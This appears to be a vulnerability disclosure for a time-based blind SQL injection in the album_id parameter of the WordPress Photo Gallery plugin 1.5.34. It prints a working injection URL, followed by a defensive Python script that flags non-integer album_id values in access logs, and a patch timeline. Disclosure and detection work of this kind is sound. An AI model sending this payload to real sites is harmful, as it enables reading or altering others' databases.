Exploits / Vulnerability Discovered: 2019-09-10
Type: webapps
Platform: php
This exploit / vulnerability, WordPress plugin Photo Gallery 1.5.34 SQL injection, is for educational purposes only; if you use it, you do so at your own risk!
# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data in the database, or even delete the database or the data in it.
# POC
In the Gallery Group tab > Add new, and in add galleries / Gallery groups, the GET request carrying the album_id parameter is vulnerable to time-based blind SQL injection. The following is the POC:
2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&
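A log check for the request above, as an added example that is not part of the original advisory: it scans web access-log lines for admin-ajax.php requests with action=albumsgalleries_bwg whose album_id is not a plain integer. The log lines are constructed samples with a placeholder nonce, and treating album_id as integer-only is an assumption based on the album_id=0 in the POC.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
# The nonce is a placeholder; the second line carries the POC value, URL-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2019:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0&width=785&height=550&bwg_nonce=NONCE HTTP/1.1" 200 5120
198.51.100.23 - - [10/Sep/2019:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=NONCE HTTP/1.1" 200 5120
203.0.113.7 - - [10/Sep/2019:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=other_action&album_id=abc HTTP/1.1" 400 12
203.0.113.9 - - [10/Sep/2019:10:02:00 +0000] "GET /gallery/?album_id=1x HTTP/1.1" 200 900
"""

# ".+?" for the target tolerates raw (unencoded) spaces in the request line.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"')
PLAIN_INT = re.compile(r"[0-9]+")  # assumption: album_id is a numeric id


def suspicious_album_id_requests(log_text):
    """Return (client_ip, album_id) for albumsgalleries_bwg requests whose
    album_id is anything other than a plain non-negative integer."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if "albumsgalleries_bwg" not in params.get("action", []):
            continue
        # Check every album_id value: a repeated parameter must not hide one.
        for value in params.get("album_id", []):
            if not PLAIN_INT.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_album_id_requests(SAMPLE_LOG):
        print(f"{ip} sent non-integer album_id: {value!r}")
```

Hits on a site still running 1.5.34 are a reason to review the database and move to the fixed release listed in the timeline.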
# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure